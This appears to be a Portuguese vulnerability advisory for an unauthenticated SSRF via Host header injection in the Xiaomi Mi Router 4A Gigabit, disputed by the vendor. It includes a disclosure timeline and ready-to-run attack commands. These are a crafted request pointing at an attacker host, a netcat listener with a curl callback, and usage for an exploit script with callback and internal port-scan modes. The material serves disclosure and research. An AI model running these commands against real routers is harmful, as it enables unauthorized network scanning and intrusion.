
SSRF não autenticado no Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) via injeção de cabeçalho Host — CVE-2026-26898
Existe uma vulnerabilidade de Server-Side Request Forgery (SSRF) no Roteador Xiaomi Mi 4A Edição Gigabit. A interface web do roteador não valida o cabeçalho HTTP Host, permitindo que um atacante não autenticado force o roteador a fazer conexões TCP de saída arbitrárias.
| Campo | Valor |
|---|
| Dispositivo | Xiaomi Mi Router 4A Gigabit Edition |
| Firmware | 3.0.24 (Internacional) |
| CVE | CVE-2026-26898 (contestado — veja Status de Divulgação abaixo) |
| CWE | CWE-918 (Server-Side Request Forgery) |
| CVSS 3.1 | 8.6 (Alto) — avaliado pelo pesquisador; fornecedor contesta a gravidade |
Status: Contestado pelo fornecedor — este relatório não foi aceito pela Xiaomi.
CVE-2026-26898 é usado aqui apenas para rastreamento; dada a disputa do fornecedor, deve ser tratado como contestado / não confirmado, não confirmado pelo fornecedor.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminal 1: Start listener
nc -l 4444
# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| Arquivo | Descrição |
|---|---|
xiaomi_ssrf_exploit.py | Exploit completo com múltiplos modos |
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| Data | Evento |
|---|---|
| 2026-01-15 | Vulnerabilidade descoberta; PoC desenvolvido |
| 2026-01-16 | Relatado à Xiaomi via HackerOne (#3513458) |
| 2026-01-23 | Xiaomi fechou o relatório como Informativo (baixo risco, não corrigirá) |
| 2026-06-03 | Aviso público publicado (este repositório) — contestado pelo fornecedor, sem patch |
Este exploit é fornecido apenas para fins educacionais e de teste de segurança autorizado. O acesso não autorizado a sistemas de computador é ilegal.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace